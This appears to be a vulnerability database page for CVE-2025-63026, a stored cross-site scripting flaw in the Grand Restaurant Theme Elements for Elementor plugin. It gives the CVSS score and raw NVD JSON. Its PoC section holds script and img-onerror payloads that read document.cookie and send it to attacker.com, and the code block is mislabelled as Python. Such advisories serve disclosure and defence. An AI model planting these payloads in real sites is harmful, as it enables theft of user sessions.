Security Vulnerability Report
中文
CVE-2025-63026 CVSS 6.5 MEDIUM

CVE-2025-63026

Published: 2026-01-22 17:16:00
Last Modified: 2026-04-27 19:16:19

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor allows Stored XSS.This issue affects Grand Restaurant Theme Elements for Elementor: from n/a through <= 2.1.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Grand Restaurant Theme Elements for Elementor <= 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63026 PoC - Stored XSS in Grand Restaurant Theme Elements for Elementor --> <!-- Attack Scenario: Inject malicious JavaScript via Elementor widget input fields --> <!-- Step 1: Identify vulnerable input field in Elementor editor --> <!-- The vulnerability exists in various text input fields of the plugin widgets --> <!-- Step 2: Inject XSS payload --> <!-- Example payload that could be injected into plugin input fields: --> <script> // Steal session cookies var stolenCookies = document.cookie; // Send stolen data to attacker-controlled server var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://attacker.com/collect', true); xhr.send('cookies=' + encodeURIComponent(stolenCookies)); // Alternative payload - Session hijacking fetch('https://attacker.com/log?cookie=' + btoa(document.cookie)); </script> <!-- Or using event handlers: --> <img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))"> <!-- Step 3: Wait for admin or other users to view the page --> <!-- The malicious script will execute in their browser context --> <!-- Simplified PoC for testing: --> <script>alert('XSS Vulnerability - CVE-2025-63026')</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63026", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.790", "lastModified": "2026-04-27T19:16:18.783", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor allows Stored XSS.This issue affects Grand Restaurant Theme Elements for Elementor: from n/a through <= 2.1.1."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en ThemeGoods Grand Restaurant Theme Elements para Elementor grandrestaurant-elementor permite XSS Almacenado. Este problema afecta a Grand Restaurant Theme Elements para Elementor: desde n/a hasta &lt;= 2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/grandrestaurant-elementor/vulnerability/wordpress-grand-restaurant-theme-elements-for-elementor-plugin-2-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}